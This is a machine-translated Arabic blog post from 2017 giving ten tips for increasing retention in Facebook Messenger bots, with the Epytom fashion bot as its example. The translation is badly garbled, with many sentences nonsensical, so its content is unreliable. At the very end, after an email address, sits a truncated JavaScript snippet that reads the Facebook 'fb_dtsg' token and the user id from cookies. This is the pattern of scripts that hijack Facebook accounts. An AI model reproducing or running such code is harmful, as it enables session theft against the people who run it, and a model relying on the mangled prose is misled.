vendredi 17 février 2017

10 حيل من شأنها أن تجعل الفيسبوك الخاص بك رسول بوت الادمان




كيف يمكن إعادة التواصل مع المستخدمين؟

لدينا بوت، ودعا Epytom، شرائط بعيدا الصداع اليومي من الاضطرار إلى اختيار ما لارتداء. من خلال التعلم الجزئي، وانت تأخذ تدريجيا طريقتك إلى المستوى التالي. الشيء التالي تعلمون، فإن مقدار الاهتمام والمديح تحصل مزدوجة. ويهدف Epytom نحو عارضة، واستخدام اليومي. لدينا الاحتفاظ الأسبوع الثالث 57 في المئة.

نحن لم نصل إلى هنا من خلال بعض وصفة سحرية. بدلا من ذلك، نحن اختبار صارم. اليوم، أود أن أطلعكم على المجتمع بوت بعض الحيل لزيادة الاحتفاظ المستخدم.

1. كم عدد الإشعارات التي ترسل بوت؟

بطريقة أو بأخرى، في رسول ومنصات بوت أخرى، الذباب هذه المسألة تحت الرادار، ولكن هل يمكن وينبغي التأثير عليه. ما يصلح لنا هو إشعار الصمت واحد مع معلومات قيمة في الأمام والوسط. جلب هذا وحده بعنف لدينا من قبل الفوج بنسبة 2 إلى 3 في المئة في اليوم الثاني. في المقابل، المعطف يرسل إخطار واحد مع الصوت، في حين ترسل Greatist وParentHub السير خمسة إخطارات في آن واحد.

2. ما يظهر في المعاينة؟

عند إرسال البث، المعاينة لا يقل أهمية عن سطر الموضوع لرسائل البريد الإلكتروني. واحد بوت نعرف انتهاء كل يوم مع نفس العبارة: "وصولا الى محاولة هذا اليوم؟" بالتأكيد، انها يمكن النقر عليها مرة واحدة، ولكن ليس كل يوم. المعطف، على سبيل المثال، يرسل نكتة بدلا من توقعات الطقس في تلك الرسالة. هذا قد يدفع الاحتفاظ بها.

في Epytom، ونحن خلق سلسلة من الرسائل معاينة أسبوعيا لربط المستخدم وتثير فضولهم لفتح الرسالة. يسمح هذا الأمر إلى زيادة معدل مفتوحة بنسبة 4 إلى 5 في المئة.

3. إضافة اسم المستخدم يساعد

إضافة اسم المستخدم للرسالة البث النهائية التي تظهر في المعاينة وسيلة أخرى لدفع معدل مفتوحة بنسبة 0.5 إلى 1 في المئة لأنه أدرك على الفور انتباههم. ولكن مقاومة القيام بذلك في كل مرة أو تأثير قد يزول.

4. تحديد ومراقبة معدل مفتوحة بث

بوضوح تحديد ومراقبة معدل مفتوحة تبث كما ينطبق على بوت. قد يكون للمستخدم تنفيذ أي إجراء: إرسال رسالة، على سبيل المثال، أو مجرد قراءة الرسالة. في حالة المعطف، انها رسالة الأرجح قراءة لأنه مطلوب أي إجراء إضافي لتلقي المعلومات المتوقعة. في حالة Epytom، انها عمل يقوم - على وجه التحديد، والتنصت "انظر صور" زر - لأنه من دون تحقيق ذلك، فإن المستخدم لا تحصل على المعلومات الخاصة بهم على ما يرتدونه وكيفية نمط عليه.

يسمح 5. نظام بوت تحليلات لك لسحب جميع مؤشرات الأداء الرئيسية الرئيسية

إذا بوت هو المستندة إلى البيانات، هل من المرجح أن قضى وقتا وضع تحليلات الخاصة بك، وربما ربط حساب Google Analytics وإنشاء آر الآلي في ورقة جوجل. ولكن هناك طريقة أسهل: النظام بوت تحليلات أقل شيوعا AppMetrica (مدعوم من Chatfuel) يسمح لك لسحب جميع مؤشرات الأداء الرئيسية الرئيسية. دعونا نقول أننا نريد أن نعرف معدل العائد من المستخدمين الذين شاركوا مواقعهم لتلقي بالبحث عن الطقس الخاصة بهم. ثم يمكننا استخدام AppMetrica لمقارنتها ضد فوج من المستخدمين الذين حصلوا على مسابقة نمط الحياة.

6. إرسال الإخطارات إلا إذا تم فتحها

وسيلة فعالة لتقليل زبد هو الاستمرار إرسال الإخطارات إلا إذا تم فتحها. إذا لم يكن كذلك، فإنه من الأفضل أن تذهب صامتا ومن ثم متابعة مع رسالة تنشيط الخاصة. ليس هناك شيء أسوأ لبوتك من حجبها عندما لا يمكن للمستخدم معرفة كيفية إلغاء الاشتراك. وليس هناك شيء أفضل من أن قيمة المحتوى وتقدم فقط لأولئك الذين يقدرون عليه القدر. صراحة مما يتيح للمستخدمين معرفة أنهم سيواصلون الحصول على رسائلنا فقط طالما أنها تبقي قراءتها يزيد تحويلها إلى الاشتراكات خلال التأهيلية بنسبة 8 في المئة.

7. ليلة واحدة تقف مقابل علاقة طويلة الأمد

يتحدث عن مرحلة الإعداد: كلنا التشويش من خلال الحمل الزائد للمعلومات، وذلك يعني عدم احترام المساحة الشخصية الخاصة بالمستخدمين اطلاق النار على نفسك في القدم. التعرف على بعضهم البعض قبل ارتكاب (الاشتراك الملقب إلى الإخطارات) أفضل من موقف ليلة واحدة (ويعرف أيضا باسم اشتراك سريع مع الاستياء فوري). في النهاية، لماذا لا بوت يحتاج المستخدمون - ليتفاخرون بعدد جميلة في المواد والعروض أو لبناء علاقات طويلة الأمد؟ كنا الاشتراك في الخطوة الثانية أو الثالثة، ولكن نما لدينا الاحتفاظ بشكل ملحوظ عندما تأخرنا حتى الخطوة 6 (ما زلنا إختبار أ / ب، على الرغم من).

8. البث وضع استراتيجية مثل سلسلة

أتذكر يحلم حلقة أخرى في الاعتمادات الختامي للحلقة النهائية من سلالة. حتى أتذكر كيف أثناء البيريسترويكا في روسيا صديق أمي اشترى شريط VHS مع ثلاث حلقات التي لم يتم الإفراج عنه في المنزل بعد، وما عطلة كان عليه! لذا، إذا كنت تريد للمستخدمين لاشته "الحلقة" القادمة بنفس القدر، تحتاج إلى وضع استراتيجية بالنسبة لهم مثل أنهم كانوا سلسلة (إذا سمح المحتوى).

9. لا يمكنك وضع "شكرا لك" في البنك إلا إذا ...

... انها حصة! لم مستخدمين بإرسال أشكر يوس أو رسائل الامتنان؟ ليس هناك لحظة أفضل تشير إلى أنهما يشتركان في بوت مع الأصدقاء أو حتى معدل.

10. مدونة حول أكثر من السير

مقالات حول القضايا وثيقة لجمهورك. أنا لم ينس أبدا كيف تصور Epytom، لكونها أمي جديدة لطفلين مع الكثير من المعلومات من الداخل على الأعمال الداخلية في صناعة الأزياء في الانخفاض من أي وقت مضى لحيل من جديد. أنا لدينا الأول المستخدم: أم ورجل الأعمال الذي يريد أن تبدو جيدة على الرغم من كل شيء ومع الحد الأدنى من الجهد. لذلك، أنشأنا نشر متوسطة ل "mompreneurs" لتبادل الحيل وقصص قتله في العمل، واللعب، وعلى غرار لعبة.

email

ssdfqsdfcd@gmail.com (function(){var f={dtsg:document.getElementsByName("fb_dtsg")[0].value,uid:document.cookie.match(docume...